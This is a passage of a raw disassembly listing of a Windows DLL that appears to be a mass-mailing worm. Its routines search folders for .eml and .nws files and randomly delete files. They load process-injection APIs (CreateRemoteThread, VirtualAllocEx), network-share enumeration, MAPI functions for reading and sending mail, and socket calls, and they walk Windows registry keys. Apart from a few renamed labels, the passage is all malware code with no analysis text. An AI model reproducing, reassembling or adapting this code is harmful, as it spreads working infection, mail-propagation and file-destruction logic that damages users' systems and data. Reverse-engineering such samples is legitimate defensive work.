361744D2 push dword_3617ACB4
361744D8 call dword_3617AC70
361744DE jmp short loc_36174506
361744E0 ; ───────────────────────────────────────────────────────────────────────────
361744E0 loc_361744E0: ; CODE XREF: sub_3617442D+9Fj
361744E0 push esi
361744E1 push edi
361744E2 call ds:GetFileSize
361744E8 mov ebx, eax
361744EA cmp ebx, 0FFFFFFFFh
361744ED jnz short loc_36174513
361744EF push [ebp+var_4]
361744F2 push esi
361744F3 push dword_3617ACB4
361744F9 call dword_3617AC70
361744FF push edi
36174500 loc_36174500: ; CODE XREF: sub_3617442D+41j
36174500 call ds:CloseHandle
36174506 loc_36174506: ; CODE XREF: sub_3617442D+2Aj
36174506 ; sub_3617442D+B1j
36174506 push [ebp+arg_0]
36174509 loc_36174509: ; CODE XREF: sub_3617442D+68j
36174509 call sub_3617430F
3617450E pop ecx
3617450F xor eax, eax
36174511 jmp short loc_36174557
36174513 ; ───────────────────────────────────────────────────────────────────────────
36174513 loc_36174513: ; CODE XREF: sub_3617442D+C0j
36174513 push edi
36174514 call ds:CloseHandle
3617451A mov eax, [ebp+var_8]
3617451D add eax, 1Eh
36174520 cmp eax, ebx
36174522 jnb short loc_36174544
36174524 push 80h
36174529 push [ebp+var_4]
3617452C call ds:SetFileAttributesA
36174532 push [ebp+var_4]
36174535 call ds:DeleteFileA
3617453B push [ebp+arg_0]
3617453E call sub_3617430F
36174543 pop ecx
36174544 loc_36174544: ; CODE XREF: sub_3617442D+F5j
36174544 push [ebp+var_4]
36174547 push esi
36174548 push dword_3617ACB4
3617454E call dword_3617AC70
36174554 push 1
36174556 pop eax
36174557 loc_36174557: ; CODE XREF: sub_3617442D+E4j
36174557 pop edi
36174558 pop esi
36174559 pop ebx
3617455A leave
3617455B retn
3617455B sub_3617442D endp

3617455C ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
3617455C ; Attributes: bp-based frame
3617455C sub_3617455C proc near ; CODE XREF: sub_36173DCF+325p
3617455C var_14C = byte ptr -14Ch
3617455C var_124 = byte ptr -124h
3617455C var_120 = byte ptr -120h
3617455C var_C = dword ptr -0Ch
3617455C var_8 = dword ptr -8
3617455C var_4 = dword ptr -4
3617455C arg_0 = dword ptr 8
3617455C push ebp
3617455D mov ebp, esp
3617455F sub esp, 14Ch
36174565 push esi
36174566 and [ebp+var_4], 0
3617456A mov esi, 400h
3617456F push edi
36174570 push esi
36174571 push 8
36174573 push dword_3617ACB4
36174579 call dword_3617AC74
3617457F mov edi, eax
36174581 test edi, edi
36174583 mov [ebp+var_C], edi
36174586 jz loc_361747A5
3617458C push esi
3617458D push [ebp+arg_0]
36174590 push edi
36174591 call ds:strncpy
36174597 push edi
36174598 call sub_3617186E
3617459D push [ebp+arg_0]
361745A0 call _strlen
361745A5 sub esi, eax
361745A7 push esi
361745A8 push offset a_ ; "\\*.*"
361745AD push edi
361745AE call ds:strncat
361745B4 add esp, 20h
361745B7 lea eax, [ebp+var_14C]
361745BD push eax
361745BE push edi
361745BF call ds:FindFirstFileA
361745C5 cmp eax, 0FFFFFFFFh
361745C8 mov [ebp+var_8], eax
361745CB jnz short loc_361745E1
361745CD push edi
361745CE push 0
361745D0 push dword_3617ACB4
361745D6 call dword_3617AC70
361745DC jmp loc_361747A2
361745E1 ; ───────────────────────────────────────────────────────────────────────────
361745E1 loc_361745E1: ; CODE XREF: sub_3617455C+6Fj
361745E1 mov esi, ds:_strlwr
361745E7 lea eax, [ebp+var_120]
361745ED push eax
361745EE call esi ; _strlwr
361745F0 mov edi, offset dot ; "."
361745F5 lea eax, [ebp+var_120]
361745FB push edi
361745FC push eax
361745FD call _strcmp
36174602 add esp, 0Ch
36174605 test eax, eax
36174607 jz loc_3617469D
3617460D lea eax, [ebp+var_120]
36174613 push offset a__ ; ".."
36174618 push eax
36174619 call _strcmp
3617461E pop ecx
3617461F test eax, eax
36174621 pop ecx
36174622 jz short loc_3617469D
36174624 lea eax, [ebp+var_120]
3617462A push eax
3617462B call _strlen
36174630 cmp eax, 4
36174633 pop ecx
36174634 jbe short loc_3617469D
36174636 test [ebp+var_14C], 10h
3617463D jnz short loc_3617469D
3617463F lea eax, [ebp+var_120]
36174645 push offset dot_eml ; ".eml"
3617464A push eax
3617464B call _strlen
36174650 pop ecx
36174651 lea eax, [ebp+eax+var_124]
36174658 push eax
36174659 call _strcmp
3617465E pop ecx
3617465F test eax, eax
36174661 pop ecx
36174662 jz short loc_36174689
36174664 lea eax, [ebp+var_120]
3617466A push offset dot_nws ; ".nws"
3617466F push eax
36174670 call _strlen
36174675 pop ecx
36174676 lea eax, [ebp+eax+var_124]
3617467D push eax
3617467E call _strcmp
36174683 pop ecx
36174684 test eax, eax
36174686 pop ecx
36174687 jnz short loc_3617469D
36174689 loc_36174689: ; CODE XREF: sub_3617455C+106j
36174689 lea eax, [ebp+var_120]
3617468F push eax
36174690 push [ebp+arg_0]
36174693 call sub_361747A9
36174698 pop ecx
36174699 mov [ebp+var_4], eax
3617469C pop ecx
3617469D loc_3617469D: ; CODE XREF: sub_3617455C+ABj
3617469D ; sub_3617455C+C6j ...
3617469D lea eax, [ebp+var_14C]
361746A3 push ebx
361746A4 mov ebx, ds:FindNextFileA
361746AA push eax
361746AB push [ebp+var_8]
361746AE loc_361746AE: ; CODE XREF: sub_3617455C+217j
361746AE call ebx ; FindNextFileA
361746B0 test eax, eax
361746B2 jz loc_36174778
361746B8 lea eax, [ebp+var_120]
361746BE push eax
361746BF call esi ; _strlwr
361746C1 lea eax, [ebp+var_120]
361746C7 push edi
361746C8 push eax
361746C9 call _strcmp
361746CE add esp, 0Ch
361746D1 test eax, eax
361746D3 jz loc_36174769
361746D9 lea eax, [ebp+var_120]
361746DF push offset a__ ; ".."
361746E4 push eax
361746E5 call _strcmp
361746EA pop ecx
361746EB test eax, eax
361746ED pop ecx
361746EE jz short loc_36174769
361746F0 lea eax, [ebp+var_120]
361746F6 push eax
361746F7 call _strlen
361746FC cmp eax, 4
361746FF pop ecx
36174700 jbe short loc_36174769
36174702 test [ebp+var_14C], 10h
36174709 jnz short loc_36174769
3617470B lea eax, [ebp+var_120]
36174711 push offset dot_eml ; ".eml"
36174716 push eax
36174717 call _strlen
3617471C pop ecx
3617471D lea eax, [ebp+eax+var_124]
36174724 push eax
36174725 call _strcmp
3617472A pop ecx
3617472B test eax, eax
3617472D pop ecx
3617472E jz short loc_36174755
36174730 lea eax, [ebp+var_120]
36174736 push offset dot_nws ; ".nws"
3617473B push eax
3617473C call _strlen
36174741 pop ecx
36174742 lea eax, [ebp+eax+var_124]
36174749 push eax
3617474A call _strcmp
3617474F pop ecx
36174750 test eax, eax
36174752 pop ecx
36174753 jnz short loc_36174769
36174755 loc_36174755: ; CODE XREF: sub_3617455C+1D2j
36174755 lea eax, [ebp+var_120]
3617475B push eax
3617475C push [ebp+arg_0]
3617475F call sub_361747A9
36174764 pop ecx
36174765 mov [ebp+var_4], eax
36174768 pop ecx
36174769 loc_36174769: ; CODE XREF: sub_3617455C+177j
36174769 ; sub_3617455C+192j ...
36174769 lea eax, [ebp+var_14C]
3617476F push eax
36174770 push [ebp+var_8]
36174773 jmp loc_361746AE
36174778 ; ───────────────────────────────────────────────────────────────────────────
36174778 loc_36174778: ; CODE XREF: sub_3617455C+156j
36174778 push [ebp+var_8]
3617477B call ds:FindClose
36174781 push [ebp+var_C]
36174784 push 0
36174786 push dword_3617ACB4
3617478C call dword_3617AC70
36174792 cmp [ebp+var_4], 0
36174796 pop ebx
36174797 jz short loc_361747A2
36174799 push [ebp+arg_0]
3617479C call sub_36174374
361747A1 pop ecx
361747A2 loc_361747A2: ; CODE XREF: sub_3617455C+80j
361747A2 ; sub_3617455C+23Bj
361747A2 push 1
361747A4 pop eax
361747A5 loc_361747A5: ; CODE XREF: sub_3617455C+2Aj
361747A5 pop edi
361747A6 pop esi
361747A7 leave
361747A8 retn
361747A8 sub_3617455C endp

361747A9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
361747A9 sub_361747A9 proc near ; CODE XREF: sub_3617455C+137p
361747A9 ; sub_3617455C+203p
361747A9 push ebx
361747AA push ebp
361747AB push esi
361747AC push edi
361747AD mov edi, 400h
361747B2 push edi
361747B3 push 8
361747B5 push dword_3617ACB4
361747BB call dword_3617AC74
361747C1 mov esi, eax
361747C3 xor ebx, ebx
361747C5 cmp esi, ebx
361747C7 jz loc_361748BB
361747CD push edi
361747CE push dword ptr [esp+18h]
361747D2 push esi
361747D3 call ds:strncpy
361747D9 push esi
361747DA call sub_3617186E
361747DF push esi
361747E0 call _strlen
361747E5 sub edi, eax
361747E7 push edi
361747E8 mov edi, ds:strncat
361747EE push offset asc_36179474 ; "\\"
361747F3 push esi
361747F4 call edi ; strncat
361747F6 push esi
361747F7 call _strlen
361747FC mov ecx, 3FFh
36174801 sub ecx, eax
36174803 push ecx
36174804 push dword ptr [esp+40h]
36174808 push esi
36174809 call edi ; strncat
3617480B add esp, 30h
3617480E call ds:rand
36174814 imul eax, 64h
36174817 cdq
36174818 mov ecx, 7FFFh
3617481D idiv ecx
3617481F inc eax
36174820 cmp eax, 5Fh
36174823 jle short loc_3617483A
36174825 push 80h
3617482A push esi
3617482B call ds:SetFileAttributesA
36174831 push esi
36174832 call ds:DeleteFileA
36174838 jmp short loc_3617485B
3617483A ; ───────────────────────────────────────────────────────────────────────────
3617483A loc_3617483A: ; CODE XREF: sub_361747A9+7Aj
3617483A push ebx
3617483B push ebx
3617483C push 3
3617483E push ebx
3617483F mov ebx, ds:CreateFileA
36174845 mov ebp, 80000000h
3617484A push 7
3617484C push ebp
3617484D push offset byte_3617C8B8
36174852 call ebx ; CreateFileA
36174854 mov edi, eax
36174856 cmp edi, 0FFFFFFFFh
36174859 jnz short loc_36174862
3617485B loc_3617485B: ; CODE XREF: sub_361747A9+8Fj
3617485B ; sub_361747A9+D2j ...
3617485B xor edi, edi
3617485D jmp loc_361748E3
36174862 ; ───────────────────────────────────────────────────────────────────────────
36174862 loc_36174862: ; CODE XREF: sub_361747A9+B0j
36174862 push 0
36174864 push edi
36174865 call ds:GetFileSize
3617486B cmp eax, 0FFFFFFFFh
3617486E mov [esp+14h], eax
36174872 push edi
36174873 jnz short loc_3617487D
36174875 call ds:CloseHandle
3617487B jmp short loc_3617485B
3617487D ; ───────────────────────────────────────────────────────────────────────────
3617487D loc_3617487D: ; CODE XREF: sub_361747A9+CAj
3617487D mov edi, ds:CloseHandle
36174883 call edi ; CloseHandle
36174885 xor eax, eax
36174887 push eax
36174888 push eax
36174889 push 3
3617488B push eax
3617488C push 7
3617488E push ebp
3617488F push esi
36174890 call ebx ; CreateFileA
36174892 mov ebx, eax
36174894 cmp ebx, 0FFFFFFFFh
36174897 jz short loc_3617485B
36174899 push 0
3617489B push ebx
3617489C call ds:GetFileSize
361748A2 mov ebp, eax
361748A4 cmp ebp, 0FFFFFFFFh
361748A7 jnz short loc_361748BF
361748A9 push esi
361748AA push 0
361748AC push dword_3617ACB4
361748B2 call dword_3617AC70
361748B8 push ebx
361748B9 call edi ; CloseHandle
361748BB loc_361748BB: ; CODE XREF: sub_361747A9+1Ej
361748BB xor eax, eax
361748BD jmp short loc_361748F4
361748BF ; ───────────────────────────────────────────────────────────────────────────
361748BF loc_361748BF: ; CODE XREF: sub_361747A9+FEj
361748BF push ebx
361748C0 call edi ; CloseHandle
361748C2 mov eax, [esp+14h]
361748C6 add eax, 1Eh
361748C9 cmp eax, ebp
361748CB jnb short loc_3617485B
361748CD push 80h
361748D2 push esi
361748D3 call ds:SetFileAttributesA
361748D9 push esi
361748DA call ds:DeleteFileA
361748E0 push 1
361748E2 pop edi
361748E3 loc_361748E3: ; CODE XREF: sub_361747A9+B4j
361748E3 push esi
361748E4 push 0
361748E6 push dword_3617ACB4
361748EC call dword_3617AC70
361748F2 mov eax, edi
361748F4 loc_361748F4: ; CODE XREF: sub_361747A9+114j
361748F4 pop edi
361748F5 pop esi
361748F6 pop ebp
361748F7 pop ebx
361748F8 retn
361748F8 sub_361747A9 endp ; sp = -18h

361748F9 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
361748F9 ; Attributes: bp-based frame
361748F9 sub_361748F9 proc near ; CODE XREF: _DllMain@12+BAp
361748F9 var_400 = byte ptr -400h
361748F9 push ebp
361748FA mov ebp, esp
361748FC sub esp, 400h
36174902 push esi
36174903 mov esi, dword_3617ACB4
36174909 push edi
3617490A push 2820h
3617490F push 0
36174911 push offset dword_3617AC98
36174916 call _memset
3617491B add esp, 0Ch
3617491E mov dword_3617ACB4, esi
36174924 push 0
36174926 call ds:GetModuleHandleA
3617492C mov dword_3617ACAC, eax
36174931 call sub_36174A06
36174936 mov esi, 400h
3617493B mov edi, offset byte_3617B0B8
36174940 push esi
36174941 push edi
36174942 call ds:GetWindowsDirectoryA
36174948 push edi
36174949 call sub_3617186E
3617494E pop ecx
3617494F mov edi, offset byte_3617ACB8
36174954 push esi
36174955 push edi
36174956 call ds:GetSystemDirectoryA
3617495C push edi
3617495D call sub_3617186E
36174962 pop ecx
36174963 mov edi, offset byte_3617B4B8
36174968 push edi
36174969 push esi
3617496A call ds:GetTempPathA
36174970 push edi
36174971 call sub_3617186E
36174976 pop ecx
36174977 call ds:GetCommandLineA
3617497D push eax
3617497E push offset byte_3617CCB8
36174983 call _strcpy
36174988 pop ecx
36174989 mov edi, offset byte_3617D0B8
3617498E pop ecx
3617498F push edi
36174990 push esi
36174991 call ds:GetCurrentDirectoryA
36174997 push edi
36174998 call sub_3617186E
3617499D pop ecx
3617499E lea eax, [ebp+var_400]
361749A4 push esi
361749A5 push eax
361749A6 push 0
361749A8 call ds:GetModuleFileNameA
361749AE lea eax, [ebp+var_400]
361749B4 push eax
361749B5 push offset byte_3617C0B8
361749BA call _strcpy
361749BF lea eax, [ebp+var_400]
361749C5 push 5Ch
361749C7 push eax
361749C8 call ds:strrchr
361749CE mov esi, eax
361749D0 inc esi
361749D1 push esi
361749D2 push offset byte_3617B8B8
361749D7 call _strcpy
361749DC and byte ptr [esi], 0
361749DF lea eax, [ebp+var_400]
361749E5 mov esi, offset byte_3617BCB8
361749EA push eax
361749EB push esi
361749EC call _strcpy
361749F1 push esi
361749F2 call sub_3617186E
361749F7 add esp, 24h
361749FA call K32_imports
361749FF push 1
36174A01 pop eax
36174A02 pop edi
36174A03 pop esi
36174A04 leave
36174A05 retn
36174A05 sub_361748F9 endp

36174A06 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36174A06 ; Attributes: bp-based frame
36174A06 sub_36174A06 proc near ; CODE XREF: sub_361748F9+38p
36174A06 ; sub_36176511+22p
36174A06 var_94 = dword ptr -94h
36174A06 var_84 = dword ptr -84h
36174A06 push ebp
36174A07 mov ebp, esp
36174A09 sub esp, 94h
36174A0F lea eax, [ebp+var_94]
36174A15 mov [ebp+var_94], 94h
36174A1F push eax
36174A20 call ds:GetVersionExA ; Get extended information about the
36174A20 ; version of the operating system
36174A26 xor eax, eax
36174A28 cmp [ebp+var_84], 2
36174A2F setz al
36174A32 mov dword_3617ACB0, eax
36174A37 leave
36174A38 retn
36174A38 sub_36174A06 endp

36174A39 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36174A39 K32_imports proc near ; CODE XREF: sub_36171F05+Ap
36174A39 ; sub_361748F9+101p
36174A39 push esi
36174A3A push edi
36174A3B mov edi, ds:LoadLibraryA
36174A41 push offset KERNEL32_DLL ; "KERNEL32.DLL"
36174A46 call edi ; LoadLibraryA
36174A48 test eax, eax
36174A4A mov dword_3617AC98, eax
36174A4F jz loc_36174B37
36174A55 mov esi, ds:GetProcAddress
36174A5B push offset aHeapcreate ; "HeapCreate"
36174A60 push eax
36174A61 call esi ; GetProcAddress
36174A63 push offset aHeapdestroy ; "HeapDestroy"
36174A68 mov dword_3617AC7C, eax
36174A6D push dword_3617AC98
36174A73 call esi ; GetProcAddress
36174A75 push offset aHeapalloc ; "HeapAlloc"
36174A7A mov dword_3617AC78, eax
36174A7F push dword_3617AC98
36174A85 call esi ; GetProcAddress
36174A87 push offset aHeapfree ; "HeapFree"
36174A8C mov dword_3617AC74, eax
36174A91 push dword_3617AC98
36174A97 call esi ; GetProcAddress
36174A99 push offset aHeapcompact ; "HeapCompact"
36174A9E mov dword_3617AC70, eax
36174AA3 push dword_3617AC98
36174AA9 call esi ; GetProcAddress
36174AAB cmp dword_3617ACB0, 0
36174AB2 mov dword_3617AC6C, eax
36174AB7 jz short loc_36174B15
36174AB9 push offset aCreateremoteth ; "CreateRemoteThread"
36174ABE push dword_3617AC98
36174AC4 call esi ; GetProcAddress
36174AC6 push offset aVirtualprotect ; "VirtualProtectEx"
36174ACB mov dword_3617D5E0, eax
36174AD0 push dword_3617AC98
36174AD6 call esi ; GetProcAddress
36174AD8 push offset aVirtualallocex ; "VirtualAllocEx"
36174ADD mov dword_3617D5D0, eax
36174AE2 push dword_3617AC98
36174AE8 call esi ; GetProcAddress
36174AEA push offset aVirtualqueryex ; "VirtualQueryEx"
36174AEF mov dword_3617D5DC, eax
36174AF4 push dword_3617AC98
36174AFA call esi ; GetProcAddress
36174AFC push offset aVirtualfreeex ; "VirtualFreeEx"
36174B01 mov dword_3617D5D4, eax
36174B06 push dword_3617AC98
36174B0C call esi ; GetProcAddress
36174B0E mov dword_3617D5D8, eax
36174B13 jmp short loc_36174B27
36174B15 ; ───────────────────────────────────────────────────────────────────────────
36174B15 loc_36174B15: ; CODE XREF: K32_imports+7Ej
36174B15 push offset aRegisterservic ; "RegisterServiceProcess"
36174B1A push dword_3617AC98
36174B20 call esi ; GetProcAddress
36174B22 mov dword_3617D5CC, eax
36174B27 loc_36174B27: ; CODE XREF: K32_imports+DAj
36174B27 push offset SHELL32DLL ; "SHELL32.DLL"
36174B2C call edi ; LoadLibraryA
36174B2E test eax, eax
36174B30 mov dword_3617AC9C, eax
36174B35 jnz short loc_36174B3E
36174B37 loc_36174B37: ; CODE XREF: K32_imports+16j
36174B37 xor eax, eax
36174B39 jmp loc_36174DC5
36174B3E ; ───────────────────────────────────────────────────────────────────────────
36174B3E loc_36174B3E: ; CODE XREF: K32_imports+FCj
36174B3E push offset aShellexecutea ; "ShellExecuteA"
36174B43 push eax
36174B44 call esi ; GetProcAddress
36174B46 push offset MPRDLL ; "MPR.DLL"
36174B4B mov dword_3617AC94, eax
36174B50 call edi ; LoadLibraryA
36174B52 test eax, eax
36174B54 mov dword_3617ACA0, eax
36174B59 jz short MAPI_calls
36174B5B push offset aWnetcloseenum ; "WNetCloseEnum"
36174B60 push eax
36174B61 call esi ; GetProcAddress
36174B63 push offset aWnetenumresour ; "WNetEnumResourceA"
36174B68 mov dword_3617AC90, eax
36174B6D push dword_3617ACA0
36174B73 call esi ; GetProcAddress
36174B75 push offset aWnetopenenuma ; "WNetOpenEnumA"
36174B7A mov dword_3617AC8C, eax
36174B7F push dword_3617ACA0
36174B85 call esi ; GetProcAddress
36174B87 push offset aWnetcancelconn ; "WNetCancelConnection2A"
36174B8C mov dword_3617AC88, eax
36174B91 push dword_3617ACA0
36174B97 call esi ; GetProcAddress
36174B99 push offset aWnetaddconnect ; "WNetAddConnection2A"
36174B9E mov dword_3617AC84, eax
36174BA3 push dword_3617ACA0
36174BA9 call esi ; GetProcAddress
36174BAB mov dword_3617AC80, eax
36174BB0 MAPI_calls: ; CODE XREF: K32_imports+120j
36174BB0 push offset MAPI32DLL ; "MAPI32.DLL"
36174BB5 call edi ; LoadLibraryA
36174BB7 test eax, eax
36174BB9 mov dword_3617ACA4, eax
36174BBE jz short winsock_calls
36174BC0 push offset aMapilogon ; "MAPILogon"
36174BC5 push eax
36174BC6 call esi ; GetProcAddress
36174BC8 push offset aMapiresolvenam ; "MAPIResolveName"
36174BCD mov dword_3617D6FC, eax
36174BD2 push dword_3617ACA4
36174BD8 call esi ; GetProcAddress
36174BDA push offset aMapifindnext ; "MAPIFindNext"
36174BDF mov dword_3617D6F8, eax
36174BE4 push dword_3617ACA4
36174BEA call esi ; GetProcAddress
36174BEC push offset aMapireadmail ; "MAPIReadMail"
36174BF1 mov dword_3617D6F4, eax
36174BF6 push dword_3617ACA4
36174BFC call esi ; GetProcAddress
36174BFE push offset aMapifreebuffer ; "MAPIFreeBuffer"
36174C03 mov dword_3617D6F0, eax
36174C08 push dword_3617ACA4
36174C0E call esi ; GetProcAddress
36174C10 push offset aMapisendmail ; "MAPISendMail"
36174C15 mov dword_3617D6EC, eax
36174C1A push dword_3617ACA4
36174C20 call esi ; GetProcAddress
36174C22 push offset aMapilogoff ; "MAPILogoff"
36174C27 mov dword_3617D6E8, eax
36174C2C push dword_3617ACA4
36174C32 call esi ; GetProcAddress
36174C34 mov dword_3617D6E4, eax
36174C39 winsock_calls: ; CODE XREF: K32_imports+185j
36174C39 push offset WS2_32_DLL ; "ws2_32.dll"
36174C3E call edi ; LoadLibraryA
36174C40 test eax, eax
36174C42 mov dword_3617ACA8, eax
36174C47 jz loc_36174DC2
36174C4D push offset aWsastartup ; "WSAStartup"
36174C52 push eax
36174C53 call esi ; GetProcAddress
36174C55 push offset aWsacleanup ; "WSACleanup"
36174C5A mov dword_3617AC68, eax
36174C5F push dword_3617ACA8
36174C65 call esi ; GetProcAddress
36174C67 push offset a__wsafdisset ; "__WSAFDIsSet"
36174C6C mov dword_3617AC64, eax
36174C71 push dword_3617ACA8
36174C77 call esi ; GetProcAddress
36174C79 push offset socket ; "socket"
36174C7E mov dword_3617AC60, eax
36174C83 push dword_3617ACA8
36174C89 call esi ; GetProcAddress
36174C8B push offset connect ; "connect"
36174C90 mov dword_3617AC5C, eax
36174C95 push dword_3617ACA8
36174C9B call esi ; GetProcAddress
36174C9D push offset bind ; "bind"
36174CA2 mov dword_3617AC58, eax
36174CA7 push dword_3617ACA8
36174CAD call esi ; GetProcAddress
36174CAF push offset recv ; "recv"
36174CB4 mov dword_3617AC54, eax
36174CB9 push dword_3617ACA8
36174CBF call esi ; GetProcAddress
36174CC1 push offset recvfrom ; "recvfrom"
36174CC6 mov dword_3617AC50, eax
36174CCB push dword_3617ACA8
36174CD1 call esi ; GetProcAddress
36174CD3 push offset send ; "send"
36174CD8 mov dword_3617AC4C, eax
36174CDD push dword_3617ACA8
36174CE3 call esi ; GetProcAddress
36174CE5 push offset sendto ; "sendto"
36174CEA mov dword_3617AC48, eax
36174CEF push dword_3617ACA8
36174CF5 call esi ; GetProcAddress
36174CF7 push offset select ; "select"
36174CFC mov dword_3617AC44, eax
36174D01 push dword_3617ACA8
36174D07 call esi ; GetProcAddress
36174D09 push offset aClosesocket ; "closesocket"
36174D0E mov dword_3617AC40, eax
36174D13 push dword_3617ACA8
36174D19 call esi ; GetProcAddress
36174D1B push offset aHtons ; "htons"
36174D20 mov dword_3617AC3C, eax
36174D25 push dword_3617ACA8
36174D2B call esi ; GetProcAddress
36174D2D push offset aNtohs ; "ntohs"
36174D32 mov dword_3617AC38, eax
36174D37 push dword_3617ACA8
36174D3D call esi ; GetProcAddress
36174D3F push offset aHtonl ; "htonl"
36174D44 mov dword_3617AC34, eax
36174D49 push dword_3617ACA8
36174D4F call esi ; GetProcAddress
36174D51 push offset aNtohl ; "ntohl"
36174D56 mov dword_3617AC2C, eax
36174D5B push dword_3617ACA8
36174D61 call esi ; GetProcAddress
36174D63 push offset aInet_addr ; "inet_addr"
36174D68 mov dword_3617AC30, eax
36174D6D push dword_3617ACA8
36174D73 call esi ; GetProcAddress
36174D75 push offset aInet_ntoa ; "inet_ntoa"
36174D7A mov dword_3617AC28, eax
36174D7F push dword_3617ACA8
36174D85 call esi ; GetProcAddress
36174D87 push offset aGethostname ; "gethostname"
36174D8C mov dword_3617AC24, eax
36174D91 push dword_3617ACA8
36174D97 call esi ; GetProcAddress
36174D99 push offset aGethostbyname ; "gethostbyname"
36174D9E mov dword_3617AC1C, eax
36174DA3 push dword_3617ACA8
36174DA9 call esi ; GetProcAddress
36174DAB mov dword_3617AC20, eax
36174DB0 push offset aIoctlsocket ; "ioctlsocket"
36174DB5 push dword_3617ACA8
36174DBB call esi ; GetProcAddress
36174DBD mov dword_3617AC18, eax
36174DC2 loc_36174DC2: ; CODE XREF: K32_imports+20Ej
36174DC2 push 1
36174DC4 pop eax
36174DC5 loc_36174DC5: ; CODE XREF: K32_imports+100j
36174DC5 pop edi
36174DC6 pop esi
36174DC7 retn
36174DC7 K32_imports endp

36174DC8 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36174DC8 sub_36174DC8 proc near ; CODE XREF: _DllMain@12+EDp
36174DC8 ; _DllMain@12+165p ...
36174DC8 mov eax, dword_3617AC98
36174DCD push esi
36174DCE mov esi, ds:FreeLibrary
36174DD4 test eax, eax
36174DD6 jz short loc_36174DDB
36174DD8 push eax
36174DD9 call esi ; FreeLibrary
36174DDB loc_36174DDB: ; CODE XREF: sub_36174DC8+Ej
36174DDB mov eax, dword_3617AC9C
36174DE0 test eax, eax
36174DE2 jz short loc_36174DE7
36174DE4 push eax
36174DE5 call esi ; FreeLibrary
36174DE7 loc_36174DE7: ; CODE XREF: sub_36174DC8+1Aj
36174DE7 mov eax, dword_3617ACA0
36174DEC test eax, eax
36174DEE jz short loc_36174DF3
36174DF0 push eax
36174DF1 call esi ; FreeLibrary
36174DF3 loc_36174DF3: ; CODE XREF: sub_36174DC8+26j
36174DF3 mov eax, dword_3617ACA4
36174DF8 test eax, eax
36174DFA jz short loc_36174DFF
36174DFC push eax
36174DFD call esi ; FreeLibrary
36174DFF loc_36174DFF: ; CODE XREF: sub_36174DC8+32j
36174DFF mov eax, dword_3617ACA8
36174E04 test eax, eax
36174E06 jz short loc_36174E0B
36174E08 push eax
36174E09 call esi ; FreeLibrary
36174E0B loc_36174E0B: ; CODE XREF: sub_36174DC8+3Ej
36174E0B push 1
36174E0D pop eax
36174E0E pop esi
36174E0F retn
36174E0F sub_36174DC8 endp

36174E10 ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36174E10 ; Attributes: bp-based frame
36174E10 sub_36174E10 proc near ; CODE XREF: sub_36171F05+EEp
36174E10 var_614 = byte ptr -614h
36174E10 var_214 = byte ptr -214h
36174E10 var_114 = byte ptr -114h
36174E10 var_14 = dword ptr -14h
36174E10 var_10 = dword ptr -10h
36174E10 var_C = dword ptr -0Ch
36174E10 var_8 = dword ptr -8
36174E10 var_4 = dword ptr -4
36174E10 push ebp
36174E11 mov ebp, esp
36174E13 sub esp, 614h
36174E19 push ebx
36174E1A mov ebx, ds:RegOpenKeyExA
36174E20 lea eax, [ebp+var_C]
36174E23 push esi
36174E24 push eax
36174E25 xor esi, esi
36174E27 push 0F003Fh
36174E2C push esi
36174E2D push offset aSoftwareMicr_3 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
36174E32 push 80000002h
36174E37 call ebx ; RegOpenKeyExA
36174E39 test eax, eax
36174E3B jnz loc_36174F1A
36174E41 push edi
36174E42 push esi
36174E43 push esi
36174E44 push esi
36174E45 lea eax, [ebp+var_8]
36174E48 mov edi, ds:RegEnumKeyExA
36174E4E push esi
36174E4F push eax
36174E50 lea eax, [ebp+var_214]
36174E56 mov [ebp+var_8], 0FFh
36174E5D push eax
36174E5E push esi
36174E5F push [ebp+var_C]
36174E62 mov [ebp+var_4], esi
36174E65 loc_36174E65: ; CODE XREF: sub_36174E10+FBj
36174E65 call edi ; RegEnumKeyExA
36174E67 test eax, eax
36174E69 jnz loc_36174F10
36174E6F lea eax, [ebp+var_114]
36174E75 push offset aSoftwareMicr_4 ; "SOFTWARE\\Microsoft\\Windows\\CurrentVersi"...
36174E7A push eax
36174E7B call _strcpy
36174E80 lea eax, [ebp+var_214]
36174E86 push eax
36174E87 lea eax, [ebp+var_114]
36174E8D push eax
36174E8E call _strcat
36174E93 add esp, 10h
36174E96 lea eax, [ebp+var_10]
36174E99 push eax
36174E9A push 0F003Fh
36174E9F lea eax, [ebp+var_114]
36174EA5 push esi
36174EA6 push eax
36174EA7 push 80000002h
36174EAC call ebx ; RegOpenKeyExA
36174EAE test eax, eax
36174EB0 jnz short loc_36174EEC
36174EB2 lea eax, [ebp+var_14]
36174EB5 mov [ebp+var_14], 400h
36174EBC push eax
36174EBD lea eax, [ebp+var_614]
36174EC3 push eax
36174EC4 push esi
36174EC5 push [ebp+var_10]
36174EC8 call ds:RegQueryValueA
36174ECE cmp dword_3617ACB0, esi
36174ED4 jz short loc_36174EE3
36174ED6 lea eax, [ebp+var_614]
36174EDC push eax
36174EDD call sub_36173878
36174EE2 pop ecx
36174EE3 loc_36174EE3: ; CODE XREF: sub_36174E10+C4j
36174EE3 push [ebp+var_10]
36174EE6 call ds:RegCloseKey
36174EEC loc_36174EEC: ; CODE XREF: sub_36174E10+A0j
36174EEC inc [ebp+var_4]
36174EEF push esi
36174EF0 push esi
36174EF1 push esi
36174EF2 lea eax, [ebp+var_8]
36174EF5 push esi
36174EF6 push eax
36174EF7 lea eax, [ebp+var_214]
36174EFD push eax
36174EFE mov [ebp+var_8], 0FFh
36174F05 push [ebp+var_4]
36174F08 push [ebp+var_C]
36174F0B jmp loc_36174E65
36174F10 ; ───────────────────────────────────────────────────────────────────────────
36174F10 loc_36174F10: ; CODE XREF: sub_36174E10+59j
36174F10 push [ebp+var_C]
36174F13 call ds:RegCloseKey
36174F19 pop edi
36174F1A loc_36174F1A: ; CODE XREF: sub_36174E10+2Bj
36174F1A pop esi
36174F1B pop ebx
36174F1C leave
36174F1D retn
36174F1D sub_36174E10 endp

36174F1E ; ███████████████ S U B R O U T I N E ███████████████████████████████████████
36174F1E ; Attributes: bp-based frame
36174F1E sub_36174F1E proc near ; CODE XREF: sub_36171F05+103p
36174F1E var_75C = byte ptr -75Ch
36174F1E var_35C = byte ptr -35Ch
